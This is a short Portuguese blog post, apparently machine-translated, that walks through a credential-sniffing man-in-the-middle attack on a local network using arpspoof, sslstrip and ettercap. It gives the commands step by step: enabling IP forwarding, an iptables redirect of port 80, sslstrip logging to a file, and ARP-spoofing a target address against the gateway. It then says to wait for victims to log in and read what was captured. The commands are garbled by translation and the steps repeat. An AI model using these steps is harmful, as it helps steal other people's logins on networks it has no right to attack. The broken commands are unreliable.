Ferramentas necessárias (isto é para linux)
Arpspoof
Sslstrip
Ettercap
Arpspoof
Sslstrip
Ettercap
Passo 1: echo 1> / proc/sys/net/ipv4/ip_forward
Passo 2: iptables-t nat-A PREROUTING-p tcp - destination-port 80-j
REDIRECT - to-ports 10000
Passo 3: sslstrip-l 10.000 -W dados
Passo 4: arpspoof-i wlan0-t 192.168.1.158 192.168.1.1
Uma vez que a ARP spoof começa, é só sentar e esperar que tudo está registado na nossa "dados" de arquivo. Uma vez que você acha que alguém pode ter entrado em um site SSL codificado, matar arpspoof e sslstrip. Agora, dê uma olhada no que nós capturamos.
Passo 4: ettercap-T-q-i wlan0
ou
Passo 4: dados gato
e, finalmente, temos isso: D
Passo 2: iptables-t nat-A PREROUTING-p tcp - destination-port 80-j
REDIRECT - to-ports 10000
Passo 3: sslstrip-l 10.000 -W dados
Passo 4: arpspoof-i wlan0-t 192.168.1.158 192.168.1.1
Uma vez que a ARP spoof começa, é só sentar e esperar que tudo está registado na nossa "dados" de arquivo. Uma vez que você acha que alguém pode ter entrado em um site SSL codificado, matar arpspoof e sslstrip. Agora, dê uma olhada no que nós capturamos.
Passo 4: ettercap-T-q-i wlan0
ou
Passo 4: dados gato
e, finalmente, temos isso: D
Nenhum comentário:
Postar um comentário